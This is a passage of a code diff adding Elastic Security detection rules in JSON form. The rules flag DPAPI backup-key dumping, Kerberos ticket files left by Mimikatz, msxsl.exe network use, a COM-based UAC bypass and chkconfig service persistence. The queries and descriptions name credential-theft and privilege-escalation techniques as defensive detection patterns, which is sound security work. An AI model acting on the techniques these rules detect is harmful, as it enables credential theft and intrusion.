+ "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.002", + "name": "Security Account Manager", + "reference": "https://attack.mitre.org/techniques/T1003/002/" + }, + { + "id": "T1003.003", + "name": "NTDS", + "reference": "https://attack.mitre.org/techniques/T1003/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1006", + "name": "Direct Volume Access", + "reference": "https://attack.mitre.org/techniques/T1006/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 5 + }, + "id": "b8386923-b02c-4b94-986a-d223d9b01f88_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_107.json b/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_107.json new file mode 100644 index 00000000000..d5ee8e4032a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_107.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation or modification of Domain Backup private keys. Adversaries may extract the Data Protection API (DPAPI) domain backup key from a Domain Controller (DC) to be able to decrypt any domain user master key file.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Creation or Modification of Domain Backup DPAPI private key", + "note": "## Triage and analysis\n\nDomain DPAPI Backup keys are stored on domain controllers and can be dumped remotely with tools such as Mimikatz. The resulting .pvk private key can be used to decrypt ANY domain user masterkeys, which then can be used to decrypt any secrets protected by those keys.\n", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and file.name : (\"ntds_capi_*.pfx\", \"ntds_capi_*.pvk\")\n", + "references": [ + "https://www.dsinternals.com/en/retrieving-dpapi-backup-keys-from-active-directory/", + "https://posts.specterops.io/operational-guidance-for-offensive-user-dpapi-abuse-1fb7fac8b107" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "b83a7e96-2eb3-4edf-8346-427b6858d3bd", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1552", + "name": "Unsecured Credentials", + "reference": "https://attack.mitre.org/techniques/T1552/", + "subtechnique": [ + { + "id": "T1552.004", + "name": "Private Keys", + "reference": "https://attack.mitre.org/techniques/T1552/004/" + } + ] + }, + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "b83a7e96-2eb3-4edf-8346-427b6858d3bd_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_108.json b/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_108.json new file mode 100644 index 00000000000..8ee1f6912e2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b83a7e96-2eb3-4edf-8346-427b6858d3bd_108.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation or modification of Domain Backup private keys. Adversaries may extract the Data Protection API (DPAPI) domain backup key from a Domain Controller (DC) to be able to decrypt any domain user master key file.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Creation or Modification of Domain Backup DPAPI private key", + "note": "## Triage and analysis\n\nDomain DPAPI Backup keys are stored on domain controllers and can be dumped remotely with tools such as Mimikatz. The resulting .pvk private key can be used to decrypt ANY domain user masterkeys, which then can be used to decrypt any secrets protected by those keys.\n", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and file.name : (\"ntds_capi_*.pfx\", \"ntds_capi_*.pvk\")\n", + "references": [ + "https://www.dsinternals.com/en/retrieving-dpapi-backup-keys-from-active-directory/", + "https://posts.specterops.io/operational-guidance-for-offensive-user-dpapi-abuse-1fb7fac8b107" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "b83a7e96-2eb3-4edf-8346-427b6858d3bd", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1552", + "name": "Unsecured Credentials", + "reference": "https://attack.mitre.org/techniques/T1552/", + "subtechnique": [ + { + "id": "T1552.004", + "name": "Private Keys", + "reference": "https://attack.mitre.org/techniques/T1552/004/" + } + ] + }, + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "b83a7e96-2eb3-4edf-8346-427b6858d3bd_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b86afe07-0d98-4738-b15d-8d7465f95ff5_105.json b/packages/security_detection_engine/kibana/security_rule/b86afe07-0d98-4738-b15d-8d7465f95ff5_105.json new file mode 100644 index 00000000000..80ef7199cff --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b86afe07-0d98-4738-b15d-8d7465f95ff5_105.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies msxsl.exe making a network connection. This may indicate adversarial activity as msxsl.exe is often leveraged by adversaries to execute malicious scripts and evade detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Network Connection via MsXsl", + "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"msxsl.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"msxsl.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\",\n \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\",\n \"100.64.0.0/10\", \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\")]\n", + "references": [ + "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "b86afe07-0d98-4738-b15d-8d7465f95ff5", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1220", + "name": "XSL Script Processing", + "reference": "https://attack.mitre.org/techniques/T1220/" + } + ] + } + ], + "type": "eql", + "version": 105 + }, + "id": "b86afe07-0d98-4738-b15d-8d7465f95ff5_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_3.json b/packages/security_detection_engine/kibana/security_rule/b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_3.json new file mode 100644 index 00000000000..c6d3f93bdc9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_3.json @@ -0,0 +1,77 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of .kirbi files. The creation of this kind of file is an indicator of an attacker running Kerberos ticket dump utilities, such as Mimikatz, and precedes attacks such as Pass-The-Ticket (PTT), which allows the attacker to impersonate users using Kerberos tickets.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Kirbi File Creation", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and file.extension : \"kirbi\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b8f8da2d-a9dc-48c0-90e4-955c0aa1259a", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + }, + { + "id": "T1558", + "name": "Steal or Forge Kerberos Tickets", + "reference": "https://attack.mitre.org/techniques/T1558/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_4.json b/packages/security_detection_engine/kibana/security_rule/b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_4.json new file mode 100644 index 00000000000..f5da64afb13 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_4.json @@ -0,0 +1,79 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of .kirbi files. The creation of this kind of file is an indicator of an attacker running Kerberos ticket dump utilities, such as Mimikatz, and precedes attacks such as Pass-The-Ticket (PTT), which allows the attacker to impersonate users using Kerberos tickets.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Kirbi File Creation", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and file.extension : \"kirbi\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b8f8da2d-a9dc-48c0-90e4-955c0aa1259a", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + }, + { + "id": "T1558", + "name": "Steal or Forge Kerberos Tickets", + "reference": "https://attack.mitre.org/techniques/T1558/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_5.json b/packages/security_detection_engine/kibana/security_rule/b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_5.json new file mode 100644 index 00000000000..a165e490441 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_5.json @@ -0,0 +1,79 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of .kirbi files. The creation of this kind of file is an indicator of an attacker running Kerberos ticket dump utilities, such as Mimikatz, and precedes attacks such as Pass-The-Ticket (PTT), which allows the attacker to impersonate users using Kerberos tickets.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Kirbi File Creation", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and file.extension : \"kirbi\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b8f8da2d-a9dc-48c0-90e4-955c0aa1259a", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + }, + { + "id": "T1558", + "name": "Steal or Forge Kerberos Tickets", + "reference": "https://attack.mitre.org/techniques/T1558/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "b8f8da2d-a9dc-48c0-90e4-955c0aa1259a_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_108.json b/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_108.json new file mode 100644 index 00000000000..2950f2d8ad1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_108.json @@ -0,0 +1,152 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to bypass User Account Control (UAC) by abusing an elevated COM Interface to launch a rogue Windows ClipUp program. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "UAC Bypass Attempt with IEditionUpgradeManager Elevated COM Interface", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"Clipup.exe\" and\n not process.executable : \"C:\\\\Windows\\\\System32\\\\ClipUp.exe\" and process.parent.name : \"dllhost.exe\" and\n /* CLSID of the Elevated COM Interface IEditionUpgradeManager */\n process.parent.args : \"/Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}\"\n", + "references": [ + "https://github.com/hfiref0x/UACME" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "b90cdde7-7e0d-4359-8bf0-2c112ce2008a", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1559", + "name": "Inter-Process Communication", + "reference": "https://attack.mitre.org/techniques/T1559/", + "subtechnique": [ + { + "id": "T1559.001", + "name": "Component Object Model", + "reference": "https://attack.mitre.org/techniques/T1559/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "b90cdde7-7e0d-4359-8bf0-2c112ce2008a_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_109.json b/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_109.json new file mode 100644 index 00000000000..81fd51fdeac --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b90cdde7-7e0d-4359-8bf0-2c112ce2008a_109.json @@ -0,0 +1,152 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to bypass User Account Control (UAC) by abusing an elevated COM Interface to launch a rogue Windows ClipUp program. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "UAC Bypass Attempt with IEditionUpgradeManager Elevated COM Interface", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"Clipup.exe\" and\n not process.executable : \"C:\\\\Windows\\\\System32\\\\ClipUp.exe\" and process.parent.name : \"dllhost.exe\" and\n /* CLSID of the Elevated COM Interface IEditionUpgradeManager */\n process.parent.args : \"/Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}\"\n", + "references": [ + "https://github.com/hfiref0x/UACME" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "b90cdde7-7e0d-4359-8bf0-2c112ce2008a", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1559", + "name": "Inter-Process Communication", + "reference": "https://attack.mitre.org/techniques/T1559/", + "subtechnique": [ + { + "id": "T1559.001", + "name": "Component Object Model", + "reference": "https://attack.mitre.org/techniques/T1559/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "b90cdde7-7e0d-4359-8bf0-2c112ce2008a_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_111.json b/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_111.json new file mode 100644 index 00000000000..1b49dfa371a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b910f25a-2d44-47f2-a873-aabdc0d355e6_111.json @@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the use of the chkconfig binary to manually add a service for management by chkconfig. Threat actors may utilize this technique to maintain persistence on a system. When a new service is added, chkconfig ensures that the service has either a start or a kill entry in every runlevel and when the system is rebooted the service file added will run providing long-term persistence.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Chkconfig Service Add", + "note": "## Triage and analysis\n\n### Investigating Chkconfig Service Add\nService files are configuration files in Linux systems used to define and manage system services. The `Chkconfig` binary can be used to manually add, delete or modify a service. \n\nMalicious actors can leverage services to achieve persistence by creating or modifying service files to execute malicious commands or payloads during system startup. This allows them to maintain unauthorized access, execute additional malicious activities, or evade detection.\n\nThis rule monitors the usage of the `chkconfig` binary to manually add a service for management by `chkconfig`, potentially indicating the creation of a persistence mechanism.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the service that was created or modified.\n- Investigate the currently enabled system services through the following commands `sudo chkconfig --list | grep on` and `sudo systemctl list-unit-files`.\n- Investigate the status of potentially suspicious services through the `chkconfig --list service_name` command. \n- Search for the `rc.d` or `init.d` service files that were created or modified, and analyze their contents.\n- Investigate whether any other files in any of the available `rc.d` or `init.d` directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/init.d/%' OR path LIKE '/etc/rc%.d/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/init.d/%' OR path LIKE '/etc/rc%.d/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate syslog through the `sudo cat /var/log/syslog | grep 'LSB'` command to find traces of the LSB header of the script (if present). If syslog is being ingested into Elasticsearch, the same can be accomplished through Kibana.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - 